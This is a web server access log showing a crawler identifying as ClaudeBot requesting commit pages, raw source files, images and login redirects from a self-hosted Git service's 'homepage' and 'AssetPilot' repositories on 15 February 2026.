[Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2Fdata%2Fnginx" [Client 216.73.216.188] [Length 23974] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 216.73.216.188] [Length 11053] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fjs%2Fi18n.js" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Ffind%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 84383] [Gzip 12.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 84388] [Gzip 12.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Ffind%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Fnginx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fcomponents%2FAbout.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnpm%2Fdata%2Fkeys.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 216.73.216.188] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&q=80&w=800" [Client 216.73.216.188] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&q=80&w=1000" [Client 216.73.216.188] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fcomponents%2FContact.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 216.73.216.188] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2FDockerfile" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Fnginx%2Fproxy_host%2F4.conf" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Fnginx%2Fproxy_host%2F3.conf" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fcomponents%2FServices.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Fnginx%2Fproxy_host%2F2.conf" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" [Client 216.73.216.188] [Length 9846] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 10948] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fassets%2Fjs%2Fi18n.js" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fmail_contact.py" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnpm" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2Fassets%2Fjs%2Fi18n.js" [Client 216.73.216.188] [Length 23299] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" [Client 216.73.216.188] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnginx.conf" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnpm" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnpm%2Fdata%2Fnginx" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 84321] [Gzip 12.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnpm%2Fdata%2Flogs" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 216.73.216.188] [Length 11024] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fupdate_status.py" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10876] [Gzip 2.99] [Sent-to 